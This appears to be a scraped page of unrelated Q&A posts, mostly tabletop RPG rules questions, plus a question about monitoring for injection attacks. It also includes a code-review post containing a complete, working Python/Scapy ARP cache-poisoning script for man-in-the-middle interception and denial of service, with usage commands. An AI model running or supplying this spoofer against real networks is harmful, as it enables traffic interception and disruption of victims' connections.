dnd 3.5e – Decisive Strike and secondary attacks

The alternative class feature decisive strike begins by saying, “As a full-round action, make one attack with an unarmed strike or a special monk weapon…” (Player’s Handbook II 51 and emphasis mine), and this makes using it a new and unique full-round action. This means that the decisive strike’s phrasing disallows its use in conjunction with typical natural attacks like a bite or gore. A typical creature can no more also make natural attacks when making a decisive strike than it can make natural attacks when casting a spell with casting time of 1 full round.

Compare the alternative class feature decisive strike to the typical monk ability that decisive strike replaces, the extraordinary ability flurry of blows (Player’s Handbook 40) that, to employ it, only mandates that the monk take the action full attack (143). Anything the monk can do during a full attack—like also making attacks with typical natural weapons—can be done when making a flurry of blows.

However, this isn’t to say that a DM should in his own campaigns continue to disallow natural attacks in conjunction with the alternative class feature decisive strike. In many campaigns, monks need all the help they can get, and a house rule that changes decisive strike to a full attack might be just the thing that sees the monk pull his weight alongside his fighter and samurai compatriots.

combat – Do NPCs get free attacks only on total Bullet Time failure or also on partial failure?

I have the original version of Ghost Ops (which uses Fudge dice), not the Savage Worlds version or the OSR version. This question is about that original version, but if you think the rules in one of the other versions can throw some light on this, please chip in.

On page 132 of the core rulebook there is an example of a failed Bullet Time action. The PC was attempting to shoot 3 NPCs in the head, and needed an 8 but only got a 6.

The book then has some more rules:

The Handler can decide that the Operator succeeded in some of the attempt. Maybe they barged the door and managed to get 2 of the attempted headshots off but missed the third.
Failing a Bullet Time event places the Operator as prone for 1 round, allowing any Tangos free attacks. Deciding to attempt Bullet Time is risky but can be ultimately rewarding.

So, if the GM has said the failed roll can be partial success (hit 2 of the NPCs) and partial failure (miss the 3rd NPC), which of these applies?

  1. It still counts as a normal fail – the PC is prone and subject to a free attack by all three NPCs (assuming the two he shot aren’t dead or disabled).
  2. It still counts as a ‘reduced’ fail – the PC is prone but only the
    third NPC, who was not hit, gets a free attack.
  3. It counts as a success – the PC is not prone and the NPC/s don’t get free attacks.
  4. The GM decides on a case by case basis.

I’m hoping there is clarification for this question in one of the expansions, or in an updated version of the pdf (I only have a print copy). I’ve failed to find any errata on the internet.

combat – In Ghost Ops do NPCs get free attacks only on total Bullet Time failure or also on partial failure?

I have the original version of Ghost Ops (which uses Fudge dice), not the Savage Worlds version or the OSR version. This question is about that original version, but if you think the rules in one of the other versions can throw some light on this, please chip in.

On page 132 of the core rulebook there is an example of a failed Bullet Time action. The PC was attempting to shoot 3 NPCs in the head, and needed an 8 but only got a 6.

The book then has some more rules:

The Handler can decide that the Operator succeeded in some of the attempt. Maybe they barged the door and managed to get 2 of the attempted headshots off but missed the third.
Failing a Bullet Time event places the Operator as prone for 1 round, allowing any Tangos free attacks. Deciding to attempt Bullet Time is risky but can be ultimately rewarding.

So, if the GM has said the failed roll can be partial success (hit 2 of the NPCs) and partial failure (miss the 3rd NPC), which of these applies?

  1. It still counts as a normal fail – the PC is prone and subject to a free attack by all three NPCs (assuming the two he shot aren’t dead or disabled).
  2. It still counts as a ‘reduced’ fail – the PC is prone but only the
    third NPC, who was not hit, gets a free attack.
  3. It counts as a success – the PC is not prone and the NPC/s don’t get free attacks.
  4. The GM decides on a case by case basis.

I’m hoping there is clarification for this question in one of the expansions, or in an updated version of the pdf (I only have a print copy). I’ve failed to find any errata on the internet.

dnd 5e – Are there any attacks or effects that reduce max HP to 0 without stating what happens?

Jeremy Crawford’s 2017 tweet

This question regarding “death by leveling” was inspired by Jeremy Crawford’s tweet that you could take a hit to your Max HP when leveling up.

The fact that you’re unlikely to take such a hit unless your constitution score is very low means you’re likely to have a low Max HP to start with, and having it drop to 0 when leveling up becomes a real possibility if you roll for it.

For Example:

Jeremiah, a Sorcerer, rolled so many 3s at character creation that he decided to put one into Constitution. At level one, that’s 6 + (-4) for a Max HP of 2.

If he doesn’t roll for Max HP gains when he levels up, 4 – 4 will never give any net gains. If he chooses to gamble for an extra point or two, however, he could drop to 0 at the very first level!

This is the most extreme example of this effect I’m aware of RAW, but the same basic effect is possible with a constitution score of 4 or 5 too. In fact, any Constitution score below 8 could leave you with 0 Max HP with enough bad rolls in a row when leveling up. Start with 6-2=4 Max, roll 4 1s, there you are.

The question you linked was asked because this didn’t seem to be directly addressed in the rules. However…

2018 Errata

In 2018 the Wizards of the Coast official Player’s Handbook Errata adjusted the wording regarding leveling up on p.15 of the PHB to read:

Each time you gain a level, you gain 1 additional Hit Die. Roll that Hit Die, add your Constitution modifier to the roll, and add the total (minimum of 1) to your hit point maximum. – PHB p.15 with errata

I’d consider that where there are two official rulings that definitely contradict one another, the later ruling would supersede the earlier one. This means that Jeremiah can no longer lose hitpoints when he levels up.

An interesting follow on effect: It seems to me that the text regarding taking the fixed average (instead of rolling your hit die) that completes that paragraph does not change the “minimum of 1” that is applied to the total:

Alternatively, you can use the fixed value shown in your class entry, which is the average result of the die roll (rounded up) – PHB p.15

So there’s not even that way to get a zero gain, but rolling, for Jeremiah, which used to carry the risk of death, now cannot be worse than taking the average – rolling: 1d6 + (-4) (minimum of 1) yields 1 or 2, but the average: 4 + (-4) (minimum of 1) always yields 1. Not a big difference, but it still means that what used to be a risky move becomes the obvious best and safest!

networking – What firewall or monitoring tool should I use to monitor potential injection attacks?

I have used fail2ban in the past to monitor failed login attempts and react or warn a user when someone attempts to brute force into an ssh server.

I would like to know if there is something similar I can use to monitor other attack vectors, such as attempts to break into web applications by injecting unexpected payloads into url requests for example.

This would mean detecting patterns for sql injection attempts, probably detecting multiple url requests by a specific user in a specific timeframe or other measures that might trigger false positives but would warn a user so one can look into any suspicious activity.

I see this as being possible either through a firewall that checks all incoming traffic and detects those patterns, or something like fail2ban which looks at logs (apache, nginx, or something else) and searches for those patterns.

Does something like this exist? If so, what are the benefits of each of the approaches?

What about outgoing connections, to try and detect users trying to abuse a server and attempting to attack external servers?

How do ranged unarmed attacks work in Pathfinder 2e?

According to the unarmed attack rolls, an unarmed attack works largely the same as a weapon attack. Likewise, a ranged unarmed attack would work like a weapon ranged attack.

Attack & Damage Rolls

You calculate attack and damage rolls of a ranged unarmed attack as you would with a ranged weapon, as indicated by page 278 of the core rulebook (emphasis mine).

Unarmed Attacks

Almost all characters start out trained in unarmed attacks. You can Strike with your fist or another body part, calculating your attack and damage rolls in the same way you would with a weapon. Unarmed attacks can belong to a weapon group (page 280), and they might have weapon traits (page 282).

Attack and damage rolls with a ranged weapon use the following calculations.

Ranged attack modifier = Dexterity modifier + proficiency bonus + other bonuses + penalties

Ranged damage roll = damage die of weapon + Strength modifier for thrown weapons + bonuses + penalties

The attack roll uses your unarmed proficiency bonus. As normal for ranged weapons, you do not add your Strength modifier to damage rolls unless the ability granting the unarmed attack says otherwise.

Other Statistics

As pointed out by the unarmed attack rules, other statistics for an unarmed attack depend on the ability that grants it. This means the ability needs to indicate the range increment for a ranged unarmed attack.

Leshy Seedpod has a 10-foot range increment

The leshy’s Seedpod feat was erroneously published without indicating the ranged unarmed attack’s ranged increment. Paizo released a clarification that that will be part of an upcoming errata.

The seedpod ranged unarmed attack granted by the Seedpod feat (page 54) has a range increment (not a flat range) of 10 feet.

python – ARP Spoofer to Set Up MitM and DOS attacks

This code “poisons” the ARP cache of victim computers. Given the IP addresses of hosts A and B, it will trick A into thinking that you’re B, and B into thinking that you’re A. This means that all the traffic that they send to the other will actually be sent to you, and you can either consume that data (DOS), or forward it along to the intended recipient, and then also forward the response back (MitM).

Simple usage:

python arpspoof.py 192.168.123.1 192.168.123.111 -t 60 -b 3 -r

This will make it intercept traffic between .1 and .111, will run for 60 seconds (-t), will send out the ARP bursts every 3 seconds (-b), and will attempt to “un-poison” each of the ARP caches when it’s done (-r).

What I’d like commented on primarily:

  • This is my first time ever touching argparse. If there’s anything I can improve on with it’s usage, I’d like to know. The main thorn in my side is I’d like to verify that there’s at least two IPs supplied, but apparently argparse‘s narg option doesn’t allow that fine of control. I’d like to know if there’s a better way than doing the manual len check after that I am.

  • To reverse the poisoning, I’m sending a real ARP request to the victim to get their MAC address, then sending out an advertisement on their behalf. This has two issues though:

    • It requires sending/receiving an ARP request/reply, which is expensive.

    • It’s extra traffic that’s generated, which makes detection more likely.


arpspoof.py

import time
from typing import Iterable, List, Dict
from itertools import permutations
import argparse as ap

from scapy.arch import get_if_hwaddr
from scapy.config import conf
from scapy.layers.l2 import ARP
from scapy.sendrecv import send, sr

MAC_REQUEST_RETRIES = 3
MAC_REQUEST_TIMEOUT = 3


def _request_macs(target_ips: Iterable(str), verbose: bool = False) -> Dict(str, str):
    reqs = ARP(pdst=list(target_ips), op="who-has")
    replies, _ = sr(reqs, retry=MAC_REQUEST_RETRIES, timeout=MAC_REQUEST_TIMEOUT, verbose=verbose)
    return {reply_stim(ARP).pdst: reply_resp(ARP).hwsrc
            for reply_stim, reply_resp in replies}


def _new_recovery_broadcast_arps(victim_ips: Iterable(str)) -> List(ARP):
    """
    Attempts to create a packet to reverse the ARP Spoofing.
    If a MAC address can't be retrieved, it will be dropped.
    A very expensive function, as it carries out ARP-requests before the packets are constructed.
    """
    victim_macs = _request_macs(victim_ips)
    return (ARP(psrc=v_ip, pdst=v_ip, hwsrc=v_mac)
            for v_ip, v_mac in victim_macs.items())


def _new_unsolicited_reply_redirect(victim_ip: str, redirect_from_ip: str) -> ARP:
    our_mac = get_if_hwaddr(conf.iface)
    return ARP(hwsrc=our_mac, psrc=redirect_from_ip, pdst=victim_ip, op="is-at")


def mass_arp_poison(victim_ips: Iterable(str),
                    burst_delay: int,
                    n_bursts: int,
                    verbose: bool = False
                    ) -> None:
    """
    Attempts to convince every host at the given addresses that we're each of the other computers.
    In the simplest form, victim_ips can be a tuple of (gateway_ip, victim_ip) to intercept a single computer's traffic.
    """
    packets = (_new_unsolicited_reply_redirect(v1, v2)
               for v1, v2 in permutations(victim_ips, 2))
    for _ in range(n_bursts):
        send(packets, verbose=verbose)
        time.sleep(burst_delay)


def mass_reverse_arp_poisoning(victim_ips: Iterable(str), verbose: bool = False) -> None:
    """
    Attempts to reverse a previous ARP cache poisoning by advertising each victim's MAC.
    """
    packets = _new_recovery_broadcast_arps(victim_ips)
    send(packets, verbose=verbose)


def intercept_between(victim_ips: Iterable(str),
                      burst_delay: int,
                      n_bursts: int,
                      reverse_poisoning_after: bool = True,
                      verbose: bool = False
                      ) -> None:
    """
    Attempts to convince every host at the given addresses that we're each of the other computers.
    In the simplest form, victim_ips can be a tuple of (gateway_ip, victim_ip) to intercept a single computer's traffic.

    If reverse_reverse_poisoning_after, it will also attempt to reverse a previous ARP cache poisoning by
    advertising each victim's MAC.
    """
    try:
        mass_arp_poison(victim_ips, burst_delay, n_bursts, verbose)
    except KeyboardInterrupt:
        pass
    finally:
        if reverse_poisoning_after:
            mass_reverse_arp_poisoning(victim_ips, verbose)


def main():
    parser = ap.ArgumentParser()
    parser.add_argument("ips", nargs="+",
                        help="The IP addresses to redirect traffic from.")
    parser.add_argument("-r", "--recover_after", action="store_true",
                        help="Whether to attempt to reverse the ARP cache poisoning afterward.")
    parser.add_argument("-t", "--total_time", default=60, type=int,
                        help="The total amount of time in seconds to run for.")
    parser.add_argument("-b", "--burst_delay", default=3, type=int,
                        help="The delay in seconds between bursts of ARPs being sent out.")
    parser.add_argument("-v", "--verbose", action="store_true",
                        help="Whether Scapy's verbose output should be show for all operations.")
    args = parser.parse_args()

    if len(args.ips) < 2:
        print("At least two addresses should be specified.")
        return

    n_bursts = args.total_time // args.burst_delay
    intercept_between(args.ips, args.burst_delay, n_bursts, args.recover_after, args.verbose)


if __name__ == '__main__':
   main()

dnd 5e – Does Martial Arts Damage Apply to Ranged Attacks with Monk Weapons?

You are conflating two seperate ideas

Weapons are either melee or ranged as defined in the table on p.149.

You can use either type to make a melee or ranged attack as defined on p.195.

These are not the same thing

That is, you can use a melee weapon to make a ranged attack – if the melee weapon has the thrown property (e.g. dagger, handaxe) then it operates as normal, if it doesn’t then it uses the rules for improvised weapons on p.148. This is also the case if you throw an ammunition property weapon if, for example, you throw your crossbow at someone because you have run out of quarrels.

Similarly, you can use a ranged weapon to make a melee attack – these are always improvised weapons (even the dart and the net) because they are not designed or balanced for hitting people while held.

Note that improvised weapons are always melee weapons: never ranged weapons. Therefore melee weapons are always melee weapons irrespective of the type of attack but ranged weapons become melee (improvised) weapons if making a melee attack.

Features can trigger off either the type of weapon or the type of attack. For example, the duelling fighting style (p.72) is triggered by the type of weapon, throwing handaxes gives +2 damage as does throwing battleaxes (but not greataxes because they need two hands).

dnd 5e – Does the Swords bard’s Slashing Flourish work with the Swashbuckler rogue’s Fancy Footwork to prevent opportunity attacks by any affected target?

This does not work; the extra damage from Slashing Flourish is not an “attack”.

The Swashbuckler rogue’s Fancy Footwork feature says (XGtE p. 47, SCAG p. 135; emphasis mine):

(…) During your turn, if you make a melee attack against a creature, that creature can’t make opportunity attacks against you for the rest of your turn.

The Swords bard’s Slashing Flourish option for the Blade Flourish feature says (XGtE, p. 15; emphasis mine):

You can expend one use of your Bardic Inspiration to cause the weapon to deal extra damage to the target you hit and to any other creature of your choice that you can see within 5 feet of you. (…)

Finally, the rules for “Making an Attack” say (emphasis mine):

If there’s ever any question whether something you’re doing counts as an attack, the rule is simple: if you’re making an attack roll, you’re making an attack.

Since the extra damage to another creature does not involve an attack roll, and the feature doesn’t say you’re “making an attack” against those other creatures, you are not “making an attack” against them. However, Fancy Footwork requires that you make an attack against the creature. Therefore, Fancy Footwork would not affect them; it would only prevent opportunity attacks from the initial creature that you actually made the attack roll against.

dnd 5e – How does the Oathbow’s benefit to ranged attacks interact with the Arcane Archer fighter’s Arcane Shot options Piercing/Seeking Arrow?

This is unclear. The main issue is this line:

On a failed save, a target takes damage as if it were hit by the arrow, plus an extra 1d6 piercing damage.

“As if it where hit with the arrow”. This is talking about a counter-factual; “the arrow didn’t hit the target, but we are talking about a situation where it did, and extract from that situation the damage it would do”.

What, exactly, is that counter-factual situation emulating?

As if “someone picked up the arrow and hit you on the head”?

As if “someone, not you, shot the arrow and hit the target”?

As if “you instead of using this power made a normal ranged attack on the target, and hit the target”?

I would argue that choice 3 is what people are implicitly emulating. They are applying your dex bonus to damage, any enhancement bonuses, any feats you have, etc.

By RAW, however, the first (someone bonked them on the head with the arrow) is just as supported, in which case the damage should be that of an improvised weapon at most with no modifier to damage from attributes.

When you make a ranged Attack roll with this weapon against your sworn enemy, you have advantage on the roll. In addition, your target gains no benefit from cover, other than total cover, and you suffer no disadvantage due to long range. If the Attack hits, your sworn enemy takes an extra 3d6 piercing damage.

The next question is, does the counter-factual “as if” case involve you making an attack roll before the arrow hits? If that counter-factual “as if” case involves you hitting the target after making a normal attack on them, then “as if the arrow hits” would deal an extra 3d6 piercing damage.

If it doesn’t include you making an attack roll before the arrow hits, I’m uncertain where in the rules you can hit a foe with an arrow without first making an attack roll. So the rules are unclear how much damage it does, ignoring this feature entirely.

Or you could choose to read the ranged attack portion as being severable where the hitting is divorced from the attack roll portion, in which case this doesn’t apply.